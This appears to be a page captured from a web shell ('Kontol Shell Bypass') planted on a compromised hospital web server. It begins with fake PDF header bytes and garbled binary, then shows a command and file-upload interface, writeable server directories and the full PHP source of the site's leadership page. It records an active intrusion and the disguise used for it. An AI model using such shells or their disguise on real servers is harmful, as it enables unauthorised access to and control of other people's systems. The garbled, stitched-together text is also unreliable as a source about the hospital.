%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/hbackup/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital_old.org/hbackup/application/views/leadership.php
<?php include("includes/header.php"); ?>

<!--BreadcrumbsStart-->
<section id="breadcrumbs">
	<div class="container">
		<div class="row">
			<div class="col-md-12">
				<h1>Leadership</h1>
			</div>
			<div class="col-md-12">
				<ul>
					<li><a href="/">Sharda Hospital</a></li>
					<li><a href="/about-us">About Us</a></li>
					<li>Leadership</li>
				</ul>
			</div>
		</div>
	</div>
</section>
<!--BreadcrumbsEnd-->

<!--MainDIV-Start-->
<section id="main">
	<div class="container">
		<div class="row">
      				<div clas="col-md-12">
					<p class="text-center">An ideal leadership is the foundation upon which Sharda Hospital has evolved as the leading super specialty hospital in Greater Noida. The able guidance of vastly experienced Medical Superintendents and HoDs of different medical branches is the major source of our excellence in medical treatments.</p>
				</div>
 		</div>
	</div>
</section>
<!--MainDIV-End-->

<!--Leadership-Start-->
<section id="leadership">
	<div class="container">
		<div class="row">
        	<div class="col-md-3">
            	<div class="leadership-list">
                	<h4>Leadership</h4>
                	<ul>
						<li ><a href="#"><i class="fa fa-angle-right" aria-hidden="true"></i> Chancellor</a></li>
						<li class="active"><a href="#"><i class="fa fa-angle-right" aria-hidden="true"></i> Pro Chancellor</a></li>
						<li class=""><a href="#"><i class="fa fa-angle-right" aria-hidden="true"></i> Vice Chancellor</a></li>
																 
																 
					</ul>
                </div>
            </div>
            
            <div class="col-md-9">
			
            	<div class="content-statick temm-page">
                <div class="image">
					<img src="http://shardagroup.org/attachments/leadership_images/chairman-2-min1.jpg">
                </div>
				<h4>MR. YATENDRA KUMAR GUPTA  
				<strong>~VICE CHAIRMAN</strong> </h4>
				<p>Born in 1966, Mr. Y.K. Gupta is a renowned educationist, social leader and a visionary industrialist who has traversed a tough road to the position he holds in Sharda Group. Brought up in Agra, he is an inventive leader who always favoured a strong and self-reliant India. He completed graduation from Agra University in the year 1987.</p>

<p>As an entrepreneur, his first business venture was supplying the scientific equipment and machinery across different states in India. While dealing with the business, Mr. Y.K. Gupta felt an acute urgency to establish a state-of-the-art educational institution in Agra to fulfill the need of high-quality professional education to the young generation thereby empowering the young India to grow.</p>

<p>With the burning desire to do something for the betterment of the students, he along with his elder brother Mr. P.K. Gupta opened the first engineering college in Uttar Pradesh named as Hindustan College of Science and Technology in Mathura. And the journey of an education reform began.</p>

<p>Together with his elder brother, Mr. YK Gupta has expanded possibilities of Sharda Group in construction, engineering tools and biotechnology. His passion to excel will permeate through these ventures too.</p>

<p><strong>Award conferred on Mr. Y.K. Gupta</strong><br>
&nbsp;“INDIA SKILL AWARD-2014” during Australia-India Skills Conference-2013</p>
 
                    
                </div>
          
            
            
        
        <br /> 
        <div class="temm-page1">
		<?php foreach($leaders as $leader){ ?>
			<div class="col-md-4 col-sm-6 text-center">
            <div class="doc-list-leader">
				<div class="hover">				
					<img src="<?php echo base_url();?>uploads/doctor/<?php if(!$leader['DoctorProfilePic']){echo 'default.jpg';}else{ echo $leader['DoctorProfilePic']; }?>" class="img-responsive">
					<div class="overlay">
						<div class="text">
							<div class="circle"><a href="<?php echo base_url();?>meetourdoctors/<?php echo $leader['DoctorPageURL']?>"><img src="<?php echo base_url();?>images/icons/hover_icon01.png"></a></div>
							<h6>Visit Doctor's Profile</h6>
						</div>
					</div>
				</div>
				<h2><a href="<?php echo base_url();?>meetourdoctors/<?php echo $leader['DoctorPageURL']?>"><?php echo $leader['DoctorTitle'].' '.$leader['DoctorName']?></a></h2> 
				<p><?php if($leader['DoctorDesignation']<=2){
					echo $leader['DesignationTitle'];
				}else{
					echo $leader['DesignationTitle'].', '.$leader['DepartmentNames'];
				}?></p>
			</div>
            </div>
		<?php } ?>
        <div class="clearfix"></div>
</div>
		  </div>	
		</div>
	</div>
</section>
<!--Leadership-End-->

<!--OurLeadership-Start-->
<section id="our_leadership">
	<div class="container">
		<div class="row">
			<div class="col-md-12 text-center">
				<h2>Awards And Accreditations</h2>
				<p>A new feather was added to the cap of Sharda University as it passed the NABH certification. The SGI group congratulates every member of the Sharda family for the achievement.</p>
				<a href="<?php echo site_url('about-us/awards-and-accreditations'); ?>" class="button">Learn more</a>
			</div>
		</div>
	</div>
</section>
<!--OurLeadership-End-->

<?php include('includes/bottom_boxes.php') ?>

<?php include('includes/quick_links.php') ?>

<?php include('includes/subscribe.php') ?>

<?php include('includes/footer.php'); ?>

Kontol Shell Bypass